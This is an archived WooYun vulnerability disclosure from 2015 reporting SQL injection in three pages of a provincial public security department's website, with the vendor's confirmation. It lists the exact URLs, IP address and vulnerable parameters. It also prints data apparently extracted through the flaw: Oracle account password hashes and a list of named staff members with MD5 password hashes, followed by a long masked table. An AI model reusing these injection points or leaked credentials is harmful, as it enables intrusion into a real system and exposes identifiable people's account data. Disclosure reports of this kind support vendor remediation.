乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-24: 细节已通知厂商并且等待厂商处理中 2015-06-25: 厂商已经确认,细节仅向厂商公开 2015-07-05: 细节向核心白帽子及相关领域专家公开 2015-07-15: 细节向普通白帽子公开 2015-07-25: 细节向实习白帽子公开 2015-08-09: 细节向公众公开
我只想说一个省的公安厅,安全性也太差了!呵呵
地址http://121.42.24.155:8888/zww/crj/content.jsp?artid=103 存在注入,参数artidhttp://121.42.24.155:8888/zww/crj/list.jsp?classid=001001存在注入,参数classidhttp://121.42.24.155:8888/zww/crj/search.jsp?keys=1234 存在注入,参数keys
NAME,PASSWORDSYS,952B6161B1061C1DPUBLIC,NULLCONNECT,NULLRESOURCE,NULLDBA,NULLSYSTEM,9DCC3A8E0FC86E7BSELECT_CATALOG_ROLE,NULLEXECUTE_CATALOG_ROLE,NULLDELETE_CATALOG_ROLE,NULLOUTLN,4A3BA55E08595C81EXP_FULL_DATABASE,NULLIMP_FULL_DATABASE,NULLLOGSTDBY_ADMINISTRATOR,NULLDBFS_ROLE,NULLDIP,CE4A36B8E06CA59CAQ_ADMINISTRATOR_ROLE,NULLAQ_USER_ROLE,NULLDATAPUMP_EXP_FULL_DATABASE,NULLDATAPUMP_IMP_FULL_DATABASE,NULLADM_PARALLEL_EXECUTE_TASK,NULLGATHER_SYSTEM_STATISTICS,NULLJAVA_DEPLOY,NULLORACLE_OCM,5A2E026A9157958CRECOVERY_CATALOG_OWNER,NULLSCHEDULER_ADMIN,NULLHS_ADMIN_SELECT_ROLE,NULLHS_ADMIN_EXECUTE_ROLE,NULLHS_ADMIN_ROLE,NULLGLOBAL_AQ_USER_ROLE,GLOBALOEM_ADVISOR,NULLOEM_MONITOR,NULLDBSNMP,9E2E31E07AE95DEBAPPQOSSYS,519D632B7EE7F63AWMSYS,7C9BA362F8314299WM_ADMIN_ROLE,NULLJAVAUSERPRIV,NULLJAVAIDPRIV,NULLJAVASYSPRIV,NULLJAVADEBUGPRIV,NULLEJBCLIENT,NULLJMXSERVER,NULLJAVA_ADMIN,NULLXS$NULL,DC4FCC8CB69A6733EXFSYS,33C758A8E388DEE5CTXSYS,71E687F036AD56E5CTXAPP,NULLXDB,88D8364765FCE6AFANONYMOUS,anonymousXDBADMIN,NULLXDB_SET_INVOKER,NULLAUTHENTICATEDUSER,NULLXDB_WEBSERVICES,NULLXDB_WEBSERVICES_WITH_PUBLIC,NULLXDB_WEBSERVICES_OVER_HTTP,NULLOLAP_DBA,NULLORDSYS,7EFA02EC7EA6B86FORDDATA,A93EC937FCD1DC2AORDPLUGINS,88A2B2C183431F00SI_INFORMTN_SCHEMA,84B8CBCA4D477FA3MDSYS,72979A94BAD2AF80ORDADMIN,NULLOLAP_XS_ADMIN,NULLOLAPSYS,4AC23CC3B15E2208_NEXT_USER,NULLCWM_USER,NULLOLAP_USER,NULLSYSMAN,C91B63D69E17FCA4MGMT_USER,NULLMGMT_VIEW,96D35642841EE31DFLOWS_FILES,4116F6F4FDB7FC55APEX_PUBLIC_USER,7C283BD1A7E5751CAPEX_ADMINISTRATOR_ROLE,NULLAPEX_030200,6D73B03D806E3601OWBSYS,610A3C38F301776FOWB$CLIENT,13D492A4459DFE0DOWB_DESIGNCENTER_VIEW,NULLOWB_USER,NULLOWBSYS_AUDIT,FD8C3D14F6B60015GSHONGSHAN,8ED10432E3536B64
PASSWORD,USERNAME202cb962ac59075b964b07152d234b70,窦艳娇c9a80d01778a3c217463bfa85a944dbe,admine10adc3949ba59abbe56e057f20f883e,程俊霖e10adc3949ba59abbe56e057f20f883e,高何璇e10adc3949ba59abbe56e057f20f883e,周静萍e10adc3949ba59abbe56e057f20f883e,霍燕e10adc3949ba59abbe56e057f20f883e,王艺蓉96e79218965eb72c92a549dd5a330112,邓斌e10adc3949ba59abbe56e057f20f883e,张静e10adc3949ba59abbe56e057f20f883e,林海e10adc3949ba59abbe56e057f20f883e,林洋e10adc3949ba59abbe56e057f20f883e,李楠e10adc3949ba59abbe56e057f20f883e,安炳豫e10adc3949ba59abbe56e057f20f883e,陈欣202cb962ac59075b964b07152d234b70,陈得民6341fc9732e112d80a7af778d225930c,张晶6341fc9732e112d80a7af778d225930c,张娜6341fc9732e112d80a7af778d225930c,万清e10adc3949ba59abbe56e057f20f883e,张晓燕96e79218965eb72c92a549dd5a330112,王海博e10adc3949ba59abbe56e057f20f883e,杜春霞5e06319eb5d400da040fba5d775dad4b,鲁小刚96e79218965eb72c92a549dd5a330112,高正梅96e79218965eb72c92a549dd5a330112,楚红梅e10adc3949ba59abbe56e057f20f883e,孙林e10adc3949ba59abbe56e057f20f883e,张丽e10adc3949ba59abbe56e057f20f883e,乔旖e10adc3949ba59abbe56e057f20f883e,李嘉雯e10adc3949ba59abbe56e057f20f883e,张希e10adc3949ba59abbe56e057f20f883e,常龙e10adc3949ba59abbe56e057f20f883e,张兰e10adc3949ba59abbe56e057f20f883e,甘露e10adc3949ba59abbe56e057f20f883e,吴海艳e10adc3949ba59abbe56e057f20f883e,薛得嵘e10adc3949ba59abbe56e057f20f883e,陈万里e10adc3949ba59abbe56e057f20f883e,柴兆奇
*****DE,USE**********fb89ad2000a**********cbfbb2da00**********cbfddb6330**********fe355600001**********ff55fc00011**********cbffbc1390**********cd1940016,ba**********03500370025**********03f3ddd0026**********04ae9160028**********cc155528a0**********cc176de930**********cc52deb9d0**********cc52f64fd0**********cc532345f0**********cc56a9d930**********cc56c21340**********d457b0059,sj**********cc5fbe6230**********cc61476d90**********641b6f30066**********64cf9030067**********fa71bdc0078**********14ccfa738**********7a493007d,62**********cd4464a250**********cd45de9910**********cd4604fa50**********cd46757e10**********480a7f80094**********cd480c2e60**********4875d5a0097**********cd48ce9f50**********4914bb6009a**********cd4988ca70**********4990265009c**********4b245b200a4**********4b236b800a2**********4b24d9200a5**********cd50a3a740**********edd729c0005**********901b0df0002**********7bef50001,ga**********947e80002,ga**********9f069200003**********d1e36c44d0**********d2991401d0**********c2d2dd4001e**********c7b840021,hu**********d4c60ff690**********d4c66aba10**********d4c6fbd540**********d4c72fa260**********14d4c730a**********d4c763d6f0**********d4dbcce5a0**********d4fdf2db40**********d4ff366430**********d4ff7e9a40**********d500383a90**********d5009a7110**********d501712510**********d504112040**********078bb630065**********d508bfd1c0**********d5131f3120**********d51509d580**********169d2dd0078**********d517606050**********d518198dd0**********606f8007f,ti**********1bd67630089**********d51bdc7850**********1c617b5008b**********1caba11008c**********d51cc7ac30**********1e07b5d0092**********d51e2c8040**********1f1e7820094**********d520452a00**********d550f79bb0**********d31420003,ba**********01b9dd40006**********cbcdf34810**********cbd023ece0**********cbd036d6a0**********cbd063af70**********cbd0ac4d20**********cb0750007,62**********fb93b1c000b**********03a59000d,qi**********cbfc0c6b60**********cbfc173600**********cbfc2b3bb0**********cbfc3fffe0**********fc5a5830012**********fd3e2a00017**********cbfda853d0**********fde3aef0005**********fdeb2070006**********fe85ffb0009**********fe8ca4b000b**********cc024c2f70**********cc068c65c0**********cc0eda6b00**********0f4602d002f**********10caad30031**********122cc8f0036**********cc172315b0**********cc1884db70**********cc4d575d40**********cc4d733e10**********cc4fdc0420**********cc53384560**********cc536f0140**********cc538b3b90**********cc5505e290**********55188fb0055**********cc58752e00**********cc59017f00**********cc5b787fc0**********cc5b810310**********cc5bdb3b10**********cc5bdb8210**********cc5c1b9310**********cc5c4beef0**********64189480065**********c314b006e,14**********d1483006f,14**********a012e4e0070**********ccb29b53e0**********a88a40073,cu**********f9478890076**********fa5d46c0077**********416e1007a,du**********11cd1b9007e**********20333740082**********2b1e0950084**********cd4b31cd50**********cd4be9dcb0**********ce5df9a760**********4ad3a0005,zf**********e0c348a0007**********ac468020004**********cfdf863900**********fe174e30007**********d0397376f0**********d096fdb1d0**********d096fdb3c0**********83c8839000f**********d2d32d7d60**********a6649001b,jy**********c27fe57001c**********c2be7cd001d**********c2efd8c001f**********d4c4ff2900**********c51a49c0028**********c5cceb70029**********d4c6547e50**********6a4d1002c,px**********d4c67bed40**********d4c74cedb0**********d4c78a9660**********d4c7d911a0**********d4c7d93740**********d4c7d94860**********d4c7d97750**********d4cb5a2260**********d4fedfadb0**********d50175a260**********d501d35970**********d501ec3a30**********d508efcd70**********0fa482d006c**********d512336af0**********d5156ac490**********d515c783e0**********17c790e007c**********f24e0007d,ti**********19e0bf10081**********d51aa58c50**********1ab5d330083**********036980085,zh**********0508a0087,zh**********0421f0086,zh**********39a6d0088,zh**********d55895a930**********d559444f50**********d559c7e5a0**********d56cc78fa0**********d57e0c13e0**********f8158ee00a2**********ba678e100ae**********a215c00b0,ny**********02c8dd800b1**********034d06e00b2**********034d0f400b3**********db6f426240**********cbcd5a0490**********cbcd70ed60**********fce03980015**********cc0fd3c1c0**********120fa2e0035**********53e080037,hk**********12e3d230038**********12fc4d70039**********1307844003a**********13e6d9a003b**********cc5fb10f10**********cc600cb5e0**********cc68399330**********cc68aad800**********cd17b2dbf0**********46c563c008e**********46ebf0c008f**********46f06b10090**********470f4560091**********477875b0092**********47d27650093**********48234f60096**********49143df0099**********4c4f56900a8**********cd50904520**********cd9b7ec030**********a91d0fe0001**********eeadb650006**********ce50c0d880**********ce96da1b90**********cfe0ec6850**********d0acf5e1c0**********30417a90012**********1153fcb0016**********d400d3f340**********d465c19bb0**********d483b00e50**********d4db3ea820**********d4e23d6c90**********d4e31d46a0**********d4fe712e20**********17ab15e007a**********17c7202007b**********d518de7110**********1ae776b0084**********d51cb4d720**********1ccc303008f**********1cd2fc60090**********1cd75470091**********d5662cbff0**********d9b263800a1**********d618830320**********d6188913d0**********d6188fccf0**********d61caeb5c0**********d69c73b890**********d69f738c10**********d6b45cf8b0**********b029c00af,ji**********0364a7800b4**********d83b290670**********37b34f600b8**********d8d3e9e0001**********a92f9e80005**********e7e910008,xi**********cbcdc45260**********fb157550008**********cbfb7326d0**********fc67a4d0013**********836860014,yu**********cbfd1c1e70**********cbfdd630e0**********fdf3a270007**********f55a6000d,19**********ff0d836000e**********cbff4b08b0**********cbff5779b0**********026bf45001f**********6fb060020,ji**********cc02718780**********cc0277e930**********cc028a7e70**********08743c4002a**********088e303002b**********092c2a2002c**********0972266002d**********11b128b0032**********cc1632f3b0**********cc18fd1550**********cc1918b9b0**********7751b20006d**********aebc00074,15**********068167e007b**********cd0ad11700**********44bf8690086**********cd45145330**********cd4563d300**********cd45b23b40**********cd464036e0**********49d8520009d**********cd4ad63150**********f0169750007**********cdf49b9870**********cee03e7930**********4732de80009**********4733c40000a**********d88bf7e0010**********5dc4c3d0018**********d4c367ca00**********d4c7853370**********d4c7d7cd80**********d4c7d8baa0**********d4c7d8e0d0**********d4c7d8fc80**********d4c7d92470**********d4c9aa4d00**********d4cde4b670**********d4dc89fc90**********d4dd50f600**********5978c0070,ti**********15ede420074**********160c0f80077**********d51fec2570**********a0c23d200ab**********a0d0cd300ac**********d841b57790**********d841e3e290**********04ac8a00002**********cbcd1c11e0**********cbfd576bb0**********cbfe4c5500**********fe52a610003**********fe640cf0004**********fe73d380005**********cbfe7ceb70**********fe7e5d50007**********cbfe7e7510**********fe8860a000a**********ff99e550013**********ffabe540014**********da68b0017,61**********001789d0019**********1a032001a,ba**********270e4001b,ba**********004369f001c**********520e3001d,hj**********045899a0027**********11cbd0f0033**********12007bd0034**********cc14142320**********cc151339b0**********cc4d8415f0**********3b9c20048,sh**********cc54a43560**********6701a980068**********cc67c7e8a0**********cc68a6c1e0**********ccb286a2e0**********b06400075,15**********1c370fc0080**********1d9beb20081**********21e10ce0083**********cd49fa5e10**********cd4a346080**********cd4abace20**********4b23f7100a3**********a9366000002**********abfd70003,62**********ac4ba0004,62**********367370004,zf**********d097913160**********6ec5ec40013**********d4c4583f60**********d4c4bd41f0**********d4c4c86910**********d4c6c53ad0**********d4c6ce3eb0**********d4c7aa1dc0**********d4c82a45a0**********d4c8d6b910**********d4c9422d70**********ca4209f0048**********ca572650049**********d4caff67c0**********cb942b2004c**********cb96ab5004d**********cbb5ea9004e**********d4ff5dec40**********d4ff6ddaa0**********d5000ab090**********d507c068d0**********d507f62b50**********d5088335d0**********d50883a730**********1428dca006f**********d5160869a0**********d4480009d,by**********64c70100004**********5cd2c530007*****
加强安全意识
危害等级:高
漏洞Rank:15
确认时间:2015-06-25 11:33
非常感谢!你提交的漏洞已验证,会尽快修复。
暂无